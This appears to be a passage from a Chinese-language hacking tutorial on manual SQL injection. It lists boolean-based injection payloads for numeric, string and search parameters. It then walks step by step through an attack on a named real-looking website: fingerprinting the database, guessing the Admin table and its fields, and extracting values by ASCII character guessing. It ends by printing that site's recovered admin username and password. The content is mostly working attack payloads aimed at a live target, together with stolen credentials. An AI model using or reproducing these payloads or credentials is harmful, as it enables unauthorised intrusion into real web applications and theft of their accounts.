首先,判断环境,寻找注入点,判断数据库类型,我们在前面的课程讲过。
其次,根据注入参数类型,在脑海中重构SQL语句的原貌.
按参数类型主要分为下面三种:
(1) ID=131 这类注入的参数是数字型,SQL语句原貌大致如下:
Select * from 表名 where 字段=131
注入的参数为ID=49 And [查询条件],即是生成语句:
Select * from 表名 where 字段=131 And [查询条件]
(2) Class=连续剧 这类注入的参数是字符型,SQL语句原貌大致概如下:
Select * from 表名 where 字段=’连续剧’
注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ,即是生成语句:
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’
(3) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
Select * from 表名 where 字段like ’%关键字%’
注入的参数为keyword=’ and [查询条件] and ‘%25’=’, 即是生成语句:
Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’
实例:
http://www.ch027.com/
第一步:判断环境,寻找注入点
第二步:判断数据类型
and (select count(*) from sysobjects)>0
and (select count(*) from msysobjects)>0
第三步:猜表名
And (Select Count(*) from Admin)>=0
如果页面就与ID=131的相同,说明附加条件成立,即表Admin存在,反之,即不存在(请牢记这种方法)。如此循环,直至猜到表名为止。
第四步:猜字段
表名猜出来后,将Count(*)替换成Count(字段名),用同样的原理猜解字段名。
And (Select Count(username) from Admin)>=0
PS:如果是SQLServer的库,我们可以通过提交些特殊字符来得到相关的表名和字段,我们在以后的课程中会做介绍。
第五步:猜字段的值(Ascii逐字解码法)
and (select top 1 len(username) from Admin)>0
and (select top 1 asc(mid(username,N,1)) from Admin)>0
表名:admin
字段:username
字段值:
username内容:xiaxiang
ASCII码:120 105 97 120 105 97 110 103
password内容:345544386
ASCII码:51 52 53 53 52 52 51 56 54
PS:英文和数字的ASCII码在1-128之间,可以用折半法加速猜解,有语言基础的朋友可以写个程序测试下,效率会有大大的提高。
